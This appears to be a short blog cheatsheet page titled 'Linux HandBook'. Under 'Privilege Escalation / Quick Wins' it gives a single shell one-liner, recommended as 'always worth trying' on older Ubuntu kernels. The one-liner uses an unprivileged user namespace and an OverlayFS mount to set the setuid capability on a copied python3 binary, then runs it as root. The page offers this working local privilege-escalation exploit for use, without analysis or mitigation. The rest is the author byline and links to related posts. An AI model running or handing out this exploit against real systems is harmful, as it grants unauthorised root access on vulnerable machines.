Skip to main content

Linux HandBook

·49 words·1 min· loading · loading ·
Linux Cheatsheet
Table of Contents

Privilege Escalation
#

Quick Wins
#

For older ubuntu kernels, this exploit is always worth trying

# Quick Wins
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")'
Trustie Rity
Author
Trustie Rity
~ A young Hacker’s Manifesto

Related

Windows HandBook
·260 words·2 mins· loading · loading
Windows Cheatsheet
This is a windows cheatsheet handbook
Sigreturn Oriented Programming
·1089 words·6 mins· loading · loading
SROP
Anything you want to know about SROP technique
Medium Blog
·390 words·2 mins· loading · loading
Medium
This is a summary of the content in my Medium Blog